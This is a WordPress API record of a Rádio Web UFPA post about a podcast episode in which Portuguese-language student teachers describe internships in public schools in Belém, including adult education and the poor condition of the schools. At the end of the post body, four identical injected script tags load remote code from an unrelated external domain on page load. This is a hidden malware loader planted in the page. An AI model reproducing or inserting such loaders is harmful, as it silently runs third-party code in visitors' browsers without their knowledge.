{"id":12804,"date":"2023-04-04T15:41:51","date_gmt":"2023-04-04T18:41:51","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=12804"},"modified":"2025-10-21T13:03:23","modified_gmt":"2025-10-21T16:03:23","slug":"o-estagio-de-lingua-portuguesa-no-ensino-fundamental","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/","title":{"rendered":"O est\u00e1gio de l\u00edngua portuguesa no Ensino Fundamental"},"content":{"rendered":"\n<div class=\"rwc-audio-block\" class=\"wp-block-radioweb-rwcaudioblock\"><div class=\"rwc-audio-block-header\"><span class=\"dashicon dashicons dashicons-media-audio\"><\/span><div class=\"rwc-audio-block-description\"><p>&#8220;Espa\u00e7o Experimental &#8211; O est\u00e1gio de l\u00edngua portuguesa no ensino fundamental &#8220;<\/p><p class=\"category\"><\/p><p>R\u00e1dio Web UFPA<\/p><\/div><\/div><audio controls><source src=\"https:\/\/radio.ufpa.br\/wp-content\/uploads\/2023\/04\/ESPACO-EXPERIMENTAL-ESTAGIO-DE-LINGUA-PORTUGUESA-NO-ENSINO-FUNDAMENTAL-2-21.03.23.mp3\" type=\"audio\/mpeg\"\/><\/audio><\/div>\n\n\n\n<p><\/p>\n\n\n\n<p>O est\u00e1gio de l\u00edngua portuguesa no Ensino Fundamental \u00e9 o tema do terceiro epis\u00f3dio da s\u00e9rie Est\u00e1gio Supervisionado. No podcast, Aline Nabi\u00e7a, Alan Chaves e Paula Pamplona, estudantes do curso de Letras &#8211; L\u00edngua Portuguesa da UFPA, comentam sobre as diferentes experi\u00eancias como estagi\u00e1rios em duas escolas p\u00fablicas de Bel\u00e9m.<\/p>\n\n\n\n<p>O trabalho, realizado durante atividade curricular da gradua\u00e7\u00e3o, foi orientado pela professora Maria Helena Rodrigues Chaves, coordenadora de est\u00e1gios da Faculdade de Letras da Universidade Federal do Par\u00e1 (FALE-UFPA). A produ\u00e7\u00e3o aborda as dificuldades da Educa\u00e7\u00e3o de Jovens e Adultos (EJA), os problemas para assimilar o conte\u00fado por causa dos m\u00e9todos tradicionais e, tamb\u00e9m, a estrutura precarizada das escolas.<\/p>\n\n\n\n<p>A estudante Aline Nabi\u00e7a, que estagiou na modalidade EJA, na Escola Estadual Cordeiro de Farias, aponta diversas quest\u00f5es que motivam tanto a evas\u00e3o quanto a volta \u00e0s aulas. Nesse sentido, Aline refor\u00e7a a import\u00e2ncia do professor enquanto agente motivador, mesmo diante da&nbsp; falta de est\u00edmulo proporcionada, principalmente, pelos poucos recursos estruturais e did\u00e1ticos-metodol\u00f3gicos. &nbsp;<\/p>\n\n\n\n<p>Uma realidade compartilhada tamb\u00e9m pelo estagi\u00e1rio Alan Chaves, que fez o est\u00e1gio na Escola Estadual de Ensino Fundamental e M\u00e9dio Dr. Freitas. &nbsp;\u201cEu pude observar a falta de incentivo aos alunos, falta de material. Em algumas aulas, os estudantes tinham que dividir os livros, n\u00e3o tinham acesso aos livros de forma individual. Outra coisa que eu pude perceber foi a estrutura da escola que deixa muito a desejar como portas caindo e banheiros em p\u00e9ssimas condi\u00e7\u00f5es de uso.\u201d<\/p>\n\n\n\n<p>No podcast, os estagi\u00e1rios tamb\u00e9m destacam que o m\u00e9todo de ensino \u00e9 uma quest\u00e3o que deve ir al\u00e9m das aulas padronizadas de l\u00edngua portuguesa. Assim, eles detacam que \u00e9 preciso ensinar a disciplina n\u00e3o somente pelo livro did\u00e1tico. Isso porque a falta de m\u00e9todo l\u00fadico e material de apoio n\u00e3o democratiza o conhecimento, ao contr\u00e1rio, perp\u00e9tua uma metodologia tradicional distanciando o aluno da aprendizagem, como ressalta a estudante Paula Pamplona.<\/p>\n\n\n\n<p>\u201cDurante o per\u00edodo da observa\u00e7\u00e3o eu pude notar que o professor tem muito da metodologia tradicional, o que j\u00e1 \u00e9 esperado, infelizmente, que seja essa coisa materializada do professor padronizar as aulas de l\u00edngua portuguesa. Quando eu e o Alan sentamos pra montarmos o nosso plano de reg\u00eancia a gente ficou muito entusiasmado porque a gente queria que ocasionasse essa ruptura nesse ensino tradicional, a gente quis levar outro m\u00e9todo de ensino, uma outra metodologia pra eles mesmo se motivarem dentro de sala de aula e perticiparem da nossa atividade\u201d. &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>Al\u00e9m do epis\u00f3dio O est\u00e1gio de l\u00edngua portuguesa no ensino fundamental, a s\u00e9rie Est\u00e1gio Supervisionado destaca outros relatos de experi\u00eancias importantes, tanto para a forma\u00e7\u00e3o de novos professores como para o&nbsp; debate acerca da educa\u00e7\u00e3o nas escolas p\u00fablicas de Bel\u00e9m e regi\u00e3o metropolitana. &nbsp;<\/p>\n<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script>","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"O est\u00e1gio de l\u00edngua portuguesa no Ensino Fundamental\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/\" aria-label=\"Read more about O est\u00e1gio de l\u00edngua portuguesa no Ensino Fundamental\">Ler mais<\/a><\/p>\n","protected":false},"author":6,"featured_media":12811,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[161],"tags":[],"class_list":["post-12804","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-espaco-experimental"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>O est\u00e1gio de l\u00edngua portuguesa no Ensino Fundamental - Radio Web UFPA<\/title>\n<meta name=\"description\" content=\"O est\u00e1gio de l\u00edngua portuguesa no ensino fundamental \u00e9 o tema do terceiro epis\u00f3dio da s\u00e9rie Est\u00e1gio Supervisionado.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"O est\u00e1gio de l\u00edngua portuguesa no Ensino Fundamental - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"O est\u00e1gio de l\u00edngua portuguesa no ensino fundamental \u00e9 o tema do terceiro epis\u00f3dio da s\u00e9rie Est\u00e1gio Supervisionado.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2023-04-04T18:41:51+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T16:03:23+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/04\/Design-sem-nome-1.jpg?fit=1920%2C1080&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"1920\" \/>\n\t<meta property=\"og:image:height\" content=\"1080\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Elissandra Batista\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Elissandra Batista\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/\"},\"author\":{\"name\":\"Elissandra Batista\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\"},\"headline\":\"O est\u00e1gio de l\u00edngua portuguesa no Ensino Fundamental\",\"datePublished\":\"2023-04-04T18:41:51+00:00\",\"dateModified\":\"2025-10-21T16:03:23+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/\"},\"wordCount\":540,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/04\/Design-sem-nome-1.jpg?fit=1920%2C1080&ssl=1\",\"articleSection\":[\"Espa\u00e7o Experimental\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/\",\"name\":\"O est\u00e1gio de l\u00edngua portuguesa no Ensino Fundamental - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/04\/Design-sem-nome-1.jpg?fit=1920%2C1080&ssl=1\",\"datePublished\":\"2023-04-04T18:41:51+00:00\",\"dateModified\":\"2025-10-21T16:03:23+00:00\",\"description\":\"O est\u00e1gio de l\u00edngua portuguesa no ensino fundamental \u00e9 o tema do terceiro epis\u00f3dio da s\u00e9rie Est\u00e1gio Supervisionado.\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/04\/Design-sem-nome-1.jpg?fit=1920%2C1080&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/04\/Design-sem-nome-1.jpg?fit=1920%2C1080&ssl=1\",\"width\":1920,\"height\":1080,\"caption\":\"O est\u00e1gio de l\u00edngua portuguesa no ensino fundamental\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"O est\u00e1gio de l\u00edngua portuguesa no Ensino Fundamental\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\",\"name\":\"Elissandra Batista\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"caption\":\"Elissandra Batista\"},\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"O est\u00e1gio de l\u00edngua portuguesa no Ensino Fundamental - Radio Web UFPA","description":"O est\u00e1gio de l\u00edngua portuguesa no ensino fundamental \u00e9 o tema do terceiro epis\u00f3dio da s\u00e9rie Est\u00e1gio Supervisionado.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/","og_locale":"pt_BR","og_type":"article","og_title":"O est\u00e1gio de l\u00edngua portuguesa no Ensino Fundamental - Radio Web UFPA","og_description":"O est\u00e1gio de l\u00edngua portuguesa no ensino fundamental \u00e9 o tema do terceiro epis\u00f3dio da s\u00e9rie Est\u00e1gio Supervisionado.","og_url":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2023-04-04T18:41:51+00:00","article_modified_time":"2025-10-21T16:03:23+00:00","og_image":[{"width":1920,"height":1080,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/04\/Design-sem-nome-1.jpg?fit=1920%2C1080&ssl=1","type":"image\/jpeg"}],"author":"Elissandra Batista","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Elissandra Batista","Est. tempo de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/"},"author":{"name":"Elissandra Batista","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6"},"headline":"O est\u00e1gio de l\u00edngua portuguesa no Ensino Fundamental","datePublished":"2023-04-04T18:41:51+00:00","dateModified":"2025-10-21T16:03:23+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/"},"wordCount":540,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/04\/Design-sem-nome-1.jpg?fit=1920%2C1080&ssl=1","articleSection":["Espa\u00e7o Experimental"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/","url":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/","name":"O est\u00e1gio de l\u00edngua portuguesa no Ensino Fundamental - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/04\/Design-sem-nome-1.jpg?fit=1920%2C1080&ssl=1","datePublished":"2023-04-04T18:41:51+00:00","dateModified":"2025-10-21T16:03:23+00:00","description":"O est\u00e1gio de l\u00edngua portuguesa no ensino fundamental \u00e9 o tema do terceiro epis\u00f3dio da s\u00e9rie Est\u00e1gio Supervisionado.","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/04\/Design-sem-nome-1.jpg?fit=1920%2C1080&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/04\/Design-sem-nome-1.jpg?fit=1920%2C1080&ssl=1","width":1920,"height":1080,"caption":"O est\u00e1gio de l\u00edngua portuguesa no ensino fundamental"},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-estagio-de-lingua-portuguesa-no-ensino-fundamental\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"O est\u00e1gio de l\u00edngua portuguesa no Ensino Fundamental"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6","name":"Elissandra Batista","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","caption":"Elissandra Batista"},"url":"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/04\/Design-sem-nome-1.jpg?fit=1920%2C1080&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-3kw","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/12804","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=12804"}],"version-history":[{"count":9,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/12804\/revisions"}],"predecessor-version":[{"id":17812,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/12804\/revisions\/17812"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/12811"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=12804"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=12804"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=12804"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}